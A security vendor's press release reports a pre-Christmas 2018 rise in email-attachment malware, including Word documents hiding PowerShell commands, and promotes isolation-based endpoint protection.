Bromium, Inc., the pioneer and leader in application isolation and containment for endpoint protection that stops advanced malware attacks, has warned organisations of the threat posed by hackers delivering malware via email attachments in the run up to Christmas. This comes after Bromium recorded a spike in the number of malicious files sent via email from October to December 2018.
Analysis of malware captured in Bromium micro-VMs found that cybercriminals are also beginning to mix and match tactics, targeting users with emails that contain malicious attachments, phishing links and drive-by download links.
The analysis showed:
- 88% of threats were delivered via email, compared to just 12% from downloadable files
- Attackers are attaching Word-borne PowerShell attacks to emails, with generic file names like, ‘Invoice 0034989’, and ‘Order 9923144’. These documents contain hidden PowerShell commands to evade detection and drop malicious payloads, exploiting a powerful built-in feature of Windows that is virtually guaranteed to be present on victim’s systems
- The average employee opens five attachments per day, which equates to 300,000 per month for a 2,000-person organisation
Michael Rosen, Senior Threat Researcher at Bromium, commented: “Last Christmas, hackers were using e-cards to slip past security tools undetected, this year, PowerShell exploits are their weapon of choice. Significantly, these attacks were caught by Bromium after they had bypassed anti-virus, firewalls and other detection-based security tools. This really shows that traditional detection-based solutions are just not up to the challenge of protecting the enterprise – too much is slipping through the net.”
The data shows that the focus on email attachments might be seasonal, as the figures contrast sharply with the first quarter of the year – when 83% of threats came from downloads. Rosen concluded: “Hackers are clever, but they are also focused on RoI. If it works, they will keep doing it until security tools wake up and start blocking them – when that happens, they simply shift gears and the whole cycle starts again. Security teams need to stop chasing hackers from one vector to the next and instead protect against everything. The only way they can do this is through protection within a layered cybersecurity stack that utilises virtualisation to protect organisations from threats, regardless of the wrapping used by hackers.”